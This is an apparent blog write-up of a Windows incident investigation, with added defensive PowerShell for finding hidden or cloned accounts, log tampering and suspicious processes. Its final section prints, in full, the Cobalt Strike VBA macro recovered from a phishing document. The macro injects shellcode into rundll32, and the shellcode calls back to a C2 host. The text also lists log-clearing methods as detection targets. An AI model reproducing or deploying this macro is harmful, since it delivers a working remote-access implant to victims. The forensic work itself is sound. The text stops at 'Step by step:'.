A Noob's Guide to Windows Incident Response (Part 1)

F0re4t   ·   Posted 2023-01-09 16:48:41   ·   Technical article

Intrusion Triage

1. Account security

```
net user
```

Check whether any unexpected users exist.

Nothing unusual, so the next thing to consider is a hidden account or a cloned account.

Finding hidden accounts

```
wmic useraccount get name,sid
```

Found a hidden account, attack$. Luckily it is not a clone, otherwise I would have had to dig through the registry as well.
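The same two checks in PowerShell, as an added example that is not part of the original post. `net user` silently omits account names ending in `$`, while the SAM seen through WMI/CIM does not, so listing every local account with its SID, RID and Administrators membership exposes an `attack$`-style hidden account directly. The second function covers the clone case the post alludes to: a cloned account keeps its own SID, but its SAM `F` blob was copied from a donor account (normally Administrator, RID 500), so the RID stored inside `F` disagrees with the key name. `HKLM\SAM` is only readable as SYSTEM, so that function has to run from something like `psexec -s powershell.exe`. `Get-CimInstance` needs PowerShell 3 or later; on older hosts substitute `Get-WmiObject`. The account name and the well-known Administrators SID are the only inputs.

```powershell
# Added example (not from the original post): hidden and cloned local account checks.

function Get-LocalAccountReport {
    # Every local account known to the SAM, including '$'-suffixed names that `net user` hides
    $accounts = Get-CimInstance Win32_UserAccount -Filter "LocalAccount = TRUE"
    # Members of the built-in Administrators group (well-known SID S-1-5-32-544)
    $adminGroup = Get-CimInstance Win32_Group -Filter "SID = 'S-1-5-32-544'"
    $admins = Get-CimAssociatedInstance -InputObject $adminGroup -ResultClassName Win32_UserAccount |
              Select-Object -ExpandProperty Name
    foreach ($a in $accounts) {
        [pscustomobject]@{
            Name     = $a.Name
            SID      = $a.SID
            RID      = [int](($a.SID -split '-')[-1])
            Hidden   = $a.Name.EndsWith('$')      # names ending in $ are omitted from `net user`
            Disabled = $a.Disabled
            IsAdmin  = ($admins -contains $a.Name)
        }
    }
}

function Get-ClonedSamAccounts {
    # Requires SYSTEM: HKLM\SAM is not readable by Administrators. User keys are named by RID in hex.
    $users = Get-ChildItem 'HKLM:\SAM\SAM\Domains\Account\Users' -ErrorAction Stop |
             Where-Object { $_.PSChildName -match '^[0-9A-Fa-f]{8}$' }
    foreach ($k in $users) {
        $keyRid = [Convert]::ToInt32($k.PSChildName, 16)
        $f      = (Get-ItemProperty -Path $k.PSPath -Name F).F     # binary account record
        $fRid   = [BitConverter]::ToInt32($f, 0x30)                 # RID field inside the F blob
        if ($fRid -ne $keyRid) {
            # A copied F blob (the classic clone) still carries the donor's RID, usually 500
            [pscustomobject]@{ Key = $k.PSChildName; KeyRID = $keyRid; FRID = $fRid; Verdict = 'cloned' }
        }
    }
}

Get-LocalAccountReport | Sort-Object Hidden, IsAdmin -Descending | Format-Table -AutoSize
# Run this one as SYSTEM only:
# Get-ClonedSamAccounts | Format-Table -AutoSize
```

A hidden account shows up with `Hidden = True`; a cloned one shows up in the second report with `FRID = 500` under a key whose own RID is something else. A normal host produces no rows from `Get-ClonedSamAccounts` at all.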

Check for unusual network connections: none

```
netstat -ano
```

Everything is in LISTENING state; there are no established connections.

Set this aside for now and start from somewhere else.

Log Analysis

Check whether the logs have been cleared

Manual clearing via the usual route: none

First check whether an event ID 1102 (audit log cleared) has been recorded.

Clearing a specific log with msf: none

If a specific log is cleared with msf, an event of type 102 is left in the System log.

Clearing logs with CS: none

No record of the operation is written, but the event log service ends up stopped and has to be restarted by hand. That is not the case here.

Clearing via a registry modification: none

For this one, open the registry and check whether an extra MiniNT key has appeared under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control.


Conclusion so far, one of two cases:

1. The intruder did not clear the logs.

2. msf was used to clear all the logs, in which case no record of the operation is left and the log service is not stopped either.

To be confirmed once the analysis is done.

Account-creation log analysis

Since the hidden account attack$ has been found, the first thing to analyse is when it was created, to get a rough idea of when the intrusion happened.

Creating the attack$ account would have produced two events: 4720 (user account created) and 4722 (user account enabled).

Disappointingly, neither event turned up, so most likely msf was used to clear all the logs, or the traces were removed by some method I don't know about. If the logs are not going to tell me anything, I need a different approach.
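The log checks from this section, and the 4720/4722 lookup for the hidden account, collected into one pass. This is an added example and not part of the original post; it uses only built-in cmdlets (`Get-WinEvent`, `Get-Service`, `Test-Path`) and has to run from an elevated prompt because the Security log is otherwise unreadable. The post reports a 102 event on its host; event ID 104 from the Microsoft-Windows-Eventlog provider is the "log file was cleared" record modern Windows writes to System for non-Security logs, so both are queried. The account name `attack$` is taken from the post; the `auditpol` hint is the check a practitioner wants before concluding that a missing 4720 means the logs were wiped, since it can equally mean User Account Management auditing was never enabled or the Security log rolled over.

```powershell
# Added example (not from the original post): log-tampering indicators plus account-creation events.
function Test-EventLogTampering {
    param([string]$Account = 'attack$')
    $findings = @()

    # Manual clear, `wevtutil cl Security` and meterpreter `clearev` all leave 1102 in the Security log
    foreach ($e in @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102 } -ErrorAction SilentlyContinue)) {
        $findings += [pscustomobject]@{ Check = 'Security log cleared (1102)'; Time = $e.TimeCreated; Detail = ($e.Message -split "`n")[0] }
    }

    # Clearing any other log is recorded in System by Microsoft-Windows-Eventlog (104; the post saw 102 on its host)
    foreach ($e in @(Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Microsoft-Windows-Eventlog'; Id = 102, 104 } -ErrorAction SilentlyContinue)) {
        $findings += [pscustomobject]@{ Check = "Log cleared (System/$($e.Id))"; Time = $e.TimeCreated; Detail = ($e.Message -split "`n")[0] }
    }

    # The Cobalt Strike route leaves no clear event but the EventLog service stopped
    $svc = Get-Service -Name EventLog
    if ($svc.Status -ne 'Running') {
        $findings += [pscustomobject]@{ Check = 'EventLog service not running'; Time = Get-Date; Detail = "Status: $($svc.Status)" }
    }

    # MiniNT key: the EventLog service behaves as if it were on WinPE and writes nothing
    if (Test-Path 'HKLM:\SYSTEM\CurrentControlSet\Control\MiniNT') {
        $findings += [pscustomobject]@{ Check = 'MiniNT key present'; Time = Get-Date; Detail = 'HKLM\SYSTEM\CurrentControlSet\Control\MiniNT' }
    }

    # 4720 (account created) / 4722 (account enabled) naming the hidden account
    $acct = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4722 } -ErrorAction SilentlyContinue |
              Where-Object { $_.Message -match [regex]::Escape($Account) })
    if ($acct.Count -gt 0) {
        foreach ($e in $acct) {
            $findings += [pscustomobject]@{ Check = "Account event $($e.Id)"; Time = $e.TimeCreated; Detail = ($e.Message -split "`n")[0] }
        }
    } else {
        # The account exists but no creation event: cleared, rolled over, or never audited
        $findings += [pscustomobject]@{ Check = "No 4720/4722 for $Account"; Time = $null; Detail = 'verify: auditpol /get /subcategory:"User Account Management"' }
    }
    $findings
}

Test-EventLogTampering -Account 'attack$' | Format-Table -AutoSize
```

An empty result from the first four checks together with a "No 4720/4722" row is exactly the situation the post describes, and the `auditpol` line is where to go next: if success auditing for User Account Management is off, the absence of 4720 says nothing about log clearing.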

Process Analysis

Check for suspicious processes

```
wmic process get commandline,executablepath,executionstate,name,priority,processid,parentprocessid /format:list
```

There is a lot of it; copy it out and go through it slowly.

```text
CommandLine=C:\Windows\system32\svchost.exe -k DcomLaunch
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=804

CommandLine="C:\Program Files\VMware\VMware Tools\vmacthlp.exe"
ExecutablePath=C:\Program Files\VMware\VMware Tools\vmacthlp.exe
ExecutionState=
Name=vmacthlp.exe
ParentProcessId=608
Priority=8
ProcessId=848

CommandLine=C:\Windows\system32\svchost.exe -k rpcss
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=880

CommandLine=C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
ExecutablePath=C:\Windows\System32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=916

CommandLine=C:\Windows\system32\svchost.exe -k GPSvcGroup
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1004

CommandLine=C:\Windows\system32\svchost.exe -k netsvcs
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=220

CommandLine=C:\Windows\system32\SLsvc.exe
ExecutablePath=C:\Windows\system32\SLsvc.exe
ExecutionState=
Name=SLsvc.exe
ParentProcessId=608
Priority=8
ProcessId=304

CommandLine=C:\Windows\system32\svchost.exe -k LocalService
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=448

CommandLine=C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
ExecutablePath=C:\Windows\System32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=736

CommandLine=C:\Windows\system32\svchost.exe -k NetworkService
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=344

CommandLine=C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1132

CommandLine=taskeng.exe {C1AD95CB-CEA5-43D4-8072-C2E0817CD62D}
ExecutablePath=C:\Windows\system32\taskeng.exe
ExecutionState=
Name=taskeng.exe
ParentProcessId=220
Priority=6
ProcessId=1140

CommandLine=C:\Windows\System32\spoolsv.exe
ExecutablePath=C:\Windows\System32\spoolsv.exe
ExecutionState=
Name=spoolsv.exe
ParentProcessId=608
Priority=8
ProcessId=1316

CommandLine="C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE"
ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE
ExecutionState=
Name=IMEDICTUPDATE.EXE
ParentProcessId=608
Priority=8
ProcessId=1368

CommandLine=taskeng.exe {36687750-3988-46D1-BC9B-560C2F7A36BA}
ExecutablePath=C:\Windows\system32\taskeng.exe
ExecutionState=
Name=taskeng.exe
ParentProcessId=220
Priority=8
ProcessId=1604

CommandLine="C:\Windows\system32\Dwm.exe"
ExecutablePath=C:\Windows\system32\Dwm.exe
ExecutionState=
Name=dwm.exe
ParentProcessId=736
Priority=8
ProcessId=1652

CommandLine=C:\Windows\Explorer.EXE
ExecutablePath=C:\Windows\Explorer.EXE
ExecutionState=
Name=explorer.exe
ParentProcessId=1620
Priority=8
ProcessId=1792

CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ExecutionState=
Name=vmtoolsd.exe
ParentProcessId=1792
Priority=8
ProcessId=1912

CommandLine=C:\Windows\system32\conime.exe
ExecutablePath=C:\Windows\system32\conime.exe
ExecutionState=
Name=conime.exe
ParentProcessId=1780
Priority=8
ProcessId=1804

CommandLine=C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1860

CommandLine=C:\Windows\system32\svchost.exe -k regsvc
ExecutablePath=C:\Windows\system32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=1928

CommandLine="C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
ExecutablePath=C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
ExecutionState=
Name=VGAuthService.exe
ParentProcessId=608
Priority=8
ProcessId=1964

CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ExecutionState=
Name=vmtoolsd.exe
ParentProcessId=608
Priority=13
ProcessId=1572

CommandLine=C:\Windows\System32\svchost.exe -k WerSvcGroup
ExecutablePath=C:\Windows\System32\svchost.exe
ExecutionState=
Name=svchost.exe
ParentProcessId=608
Priority=8
ProcessId=2008

CommandLine="C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
ExecutionState=
Name=OSPPSVC.EXE
ParentProcessId=608
Priority=8
ProcessId=1580

CommandLine=C:\Windows\system32\wbem\wmiprvse.exe
ExecutablePath=C:\Windows\system32\wbem\wmiprvse.exe
ExecutionState=
Name=WmiPrvSE.exe
ParentProcessId=804
Priority=8
ProcessId=2172

CommandLine=C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
ExecutablePath=C:\Windows\system32\dllhost.exe
ExecutionState=
Name=dllhost.exe
ParentProcessId=608
Priority=8
ProcessId=2436

CommandLine=C:\Windows\System32\msdtc.exe
ExecutablePath=C:\Windows\System32\msdtc.exe
ExecutionState=
Name=msdtc.exe
ParentProcessId=608
Priority=8
ProcessId=2548

CommandLine="C:\Windows\system32\wuauclt.exe"
ExecutablePath=C:\Windows\system32\wuauclt.exe
ExecutionState=
Name=wuauclt.exe
ParentProcessId=220
Priority=8
ProcessId=2632

CommandLine="C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
ExecutablePath=C:\Windows\system32\mmc.exe
ExecutionState=
Name=mmc.exe
ParentProcessId=1612
Priority=8
ProcessId=2740

CommandLine="C:\Windows\system32\cmd.exe"
ExecutablePath=C:\Windows\system32\cmd.exe
ExecutionState=
Name=cmd.exe
ParentProcessId=1792
Priority=8
ProcessId=2212

CommandLine=wmic process get commandline,executablepath,executionstate,name,priority,processid,parentprocessid /format:list
ExecutablePath=C:\Windows\System32\Wbem\WMIC.exe
ExecutionState=
Name=WMIC.exe
ParentProcessId=2212
Priority=8
ProcessId=2168
```

How the hell am I supposed to spot anything in this by eye?

What now? Can't do it by hand, so bring in the tools!
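Before reaching for procexp, a handful of parent/child rules over the same data makes the interesting process stand out on its own. This is an added example, not part of the original post: the function takes any list of objects with `Name`, `ProcessId`, `ParentProcessId`, `CommandLine` and `ExecutablePath` (exactly the fields in the wmic dump above, or `Get-CimInstance Win32_Process` on a live host) and reports processes whose lineage is wrong. The rules encode facts about a healthy Windows tree: every `svchost.exe` is a child of `services.exe` and carries a `-k` group; Office or a mail client never legitimately spawns `rundll32`, `mshta`, `regsvr32` and friends; `rundll32.exe` started with no DLL argument has nothing to do, which is precisely how the macro in this case uses it as a sacrificial host; and a process named like a system binary but running from outside `\Windows` is a masquerade. The sample process list is constructed for the demonstration and is not the dump from the post.

```powershell
# Added example (not from the original post): parent/child heuristics over a process list.
function Get-SuspiciousProcesses {
    param([Parameter(Mandatory)][object[]]$Processes)   # Name, ProcessId, ParentProcessId, CommandLine, ExecutablePath

    $byPid = @{}
    foreach ($p in $Processes) { $byPid[[int]$p.ProcessId] = $p }

    $officeApps = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'foxmail.exe')
    $lolbins    = @('rundll32.exe', 'regsvr32.exe', 'mshta.exe', 'powershell.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'certutil.exe')
    $sysBins    = @('svchost.exe', 'lsass.exe', 'csrss.exe', 'services.exe', 'explorer.exe', 'rundll32.exe', 'dllhost.exe')

    foreach ($p in $Processes) {
        $name       = $p.Name.ToLower()
        $parent     = $byPid[[int]$p.ParentProcessId]
        $parentName = if ($parent) { $parent.Name.ToLower() } else { '<exited>' }
        $reasons    = @()

        # svchost is only ever started by services.exe and always carries a -k service group
        if ($name -eq 'svchost.exe' -and ($parentName -ne 'services.exe' -or $p.CommandLine -notmatch '\s-k\s')) {
            $reasons += 'svchost not under services.exe or without -k'
        }
        # Office or a mail client launching a LOLBin is the macro-dropper pattern from this case
        if (($officeApps -contains $parentName) -and ($lolbins -contains $name)) {
            $reasons += "spawned by $parentName"
        }
        # rundll32 with no DLL argument has nothing legitimate to do: a sacrificial host for injected code
        if ($name -eq 'rundll32.exe' -and $p.CommandLine -match '^\s*"?[^"]*rundll32\.exe"?\s*$') {
            $reasons += 'rundll32 with no arguments'
        }
        # a system binary whose image is not under \Windows is masquerading
        if (($sysBins -contains $name) -and $p.ExecutablePath -and $p.ExecutablePath -notmatch '^[A-Za-z]:\\Windows\\') {
            $reasons += 'system binary name outside \Windows'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Pid = $p.ProcessId; Name = $p.Name; Parent = $parentName; Reason = ($reasons -join '; '); CommandLine = $p.CommandLine }
        }
    }
}

# Constructed sample (not the dump above): a normal services.exe -> svchost chain, then Word spawning an
# argument-less 32-bit rundll32 the way the macro does, plus a fake svchost in a user-writable path.
$sample = @(
    [pscustomobject]@{ Name = 'services.exe'; ProcessId = 608;  ParentProcessId = 500;  CommandLine = 'C:\Windows\system32\services.exe';               ExecutablePath = 'C:\Windows\system32\services.exe' }
    [pscustomobject]@{ Name = 'svchost.exe';  ProcessId = 804;  ParentProcessId = 608;  CommandLine = 'C:\Windows\system32\svchost.exe -k DcomLaunch'; ExecutablePath = 'C:\Windows\system32\svchost.exe' }
    [pscustomobject]@{ Name = 'explorer.exe'; ProcessId = 1792; ParentProcessId = 1620; CommandLine = 'C:\Windows\Explorer.EXE';                       ExecutablePath = 'C:\Windows\Explorer.EXE' }
    [pscustomobject]@{ Name = 'WINWORD.EXE';  ProcessId = 3000; ParentProcessId = 1792; CommandLine = '"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Public\lure.docm"'; ExecutablePath = 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' }
    [pscustomobject]@{ Name = 'rundll32.exe'; ProcessId = 3100; ParentProcessId = 3000; CommandLine = 'C:\Windows\SysWOW64\rundll32.exe';              ExecutablePath = 'C:\Windows\SysWOW64\rundll32.exe' }
    [pscustomobject]@{ Name = 'svchost.exe';  ProcessId = 3200; ParentProcessId = 1792; CommandLine = 'C:\Users\Public\svchost.exe -k netsvcs';        ExecutablePath = 'C:\Users\Public\svchost.exe' }
)
Get-SuspiciousProcesses -Processes $sample | Format-Table -AutoSize

# Live host (PowerShell 3+; use Get-WmiObject Win32_Process on older systems):
# Get-SuspiciousProcesses -Processes (Get-CimInstance Win32_Process) | Format-Table -AutoSize
```

On the sample, only two rows come back: pid 3100 (`spawned by winword.exe; rundll32 with no arguments`) and pid 3200 (`svchost not under services.exe or without -k; system binary name outside \Windows`). The real `svchost -k DcomLaunch` under pid 608 and `explorer.exe`, whose parent has already exited, are left alone. Run against the dump above, the rules would have been quiet too, because the macro's rundll32 was no longer alive at that point; that is the gap a live process list cannot close and is why the desktop artefacts mattered more.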

Uploaded procexp.

Well, well.

Rigid thinking!!!!

My incident-response thinking was far too rigid: I went straight into the routine checklist from experience and wasted a lot of time.

Just when I was at a dead end I noticed... wait, there were already two files on the desktop?!

And the hints could hardly have been more obvious:

First: a document with macros enabled

Second: Foxmail

That spells it out plainly: a phishing e-mail plus a macro payload calling back to C2.

Truly, there is no hacker more brazen than you and no incident-response engineer dumber than me...

So, preliminary determination: phishing e-mail + CS macro payload callback.

After I clicked the document carrying the CS macro, I checked the connections again.

Still no beacon traffic. I don't know whether the implant was abandoned because too much time had passed or for some other reason.

Malicious Sample Analysis

Looking at the macro

```vba
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If
Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _
13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _
-42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _
-117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _
-43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 64, 31, 0, 0, 83, 80, 104, 87, -119, -97, _
-58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _
104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _
-43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _
-1, -1, 47, 57, 69, 117, 105, 0, 50, -17, 48, -30, -20, 49, -42, 91, -113, -15, -38, 25, 103, -98, 68, -2, -55, -82, -23, -73, 0, 122, -72, 48, 65, 102, -105, -53, -89, 61, -64, -25, _
-66, -15, -78, 2, 60, 114, -62, 84, -93, 39, 111, -93, 15, -51, 36, -64, 92, 74, -18, 50, 48, -90, -115, -28, -28, -24, -57, -22, -59, 15, -104, 48, -105, -69, -34, -14, -108, -36, -118, -102, _
-78, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _
83, 73, 69, 32, 57, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, _
53, 46, 48, 59, 32, 66, 79, 73, 69, 57, 59, 69, 78, 85, 83, 83, 69, 77, 41, 13, 10, 0, -31, 98, -128, 117, -15, -11, 37, 50, -90, -79, 12, -110, 87, -11, 72, 29, -15, 99, _
-43, -2, -75, 115, -57, -116, 54, -15, -4, 87, -87, 115, 7, -75, 97, -90, 77, -97, 94, 111, -60, 116, -57, -81, 24, -52, -128, 66, 80, 55, -33, 2, 81, 94, 105, 7, -26, -55, 122, -70, _
-40, -47, -47, 81, -121, 73, -18, 53, 1, -13, 120, -76, 28, -73, 100, -12, 85, 77, 66, 16, 91, -51, 17, -70, 115, -10, -24, -32, -113, -38, -119, 108, -46, 116, -89, -109, -93, 61, -118, 51, _
-19, -85, 27, -101, -47, -123, -85, -78, -76, -81, -34, -71, 127, 123, -66, -38, -34, 70, -101, 102, 61, -47, -27, -29, -67, 112, -4, -58, 86, -21, 95, 53, 10, 75, 1, 67, 111, 107, -11, -108, _
5, 57, -15, -47, -58, -104, 29, -111, -13, 35, 106, -67, -47, -36, -36, -20, -26, 119, -17, -87, -23, 5, -24, 79, -74, -70, 65, 85, 65, -88, 22, -44, -9, 33, -21, 60, 52, 64, -82, 85, _
26, 23, 90, 69, 15, 53, -85, -70, -108, -122, 60, 12, 10, 10, -55, 89, -46, 109, -32, -53, -76, -13, 52, -96, -44, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _
104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _
-123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 48, 46, 50, 48, 46, 50, 52, 46, 49, 56, 0, 18, 52, 86, 120)
If Len(Environ("ProgramW6432")) > 0 Then
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
Else
sProc = Environ("windir") & "\\System32\\rundll32.exe"
End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
```

This is the plain VBA macro that Cobalt Strike generates directly from its payload menu, with no encryption, obfuscation or other evasion applied.

Brief analysis

The macro pulls four functions out of KERNEL32.dll under throwaway aliases:

```vba
' 1. CreateRemoteThread: start a thread inside another process
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
' 2. VirtualAllocEx: allocate memory inside another process (the cross-process form of VirtualAlloc)
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
' 3. WriteProcessMemory: write into another process's memory
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
' 4. CreateProcessA: start a new process
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
```

Everything after that is about getting the shellcode, the blob in myArray, into memory. Two things in the blob are readable without any decoding: the last few elements 49, 48, 46, 50, 48, 46, 50, 52, 46, 49, 56 are the ASCII string 10.20.24.18, the host the stager calls back to, and the long run beginning 85, 115, 101, 114 is the User-Agent header it sends.

Step by step:

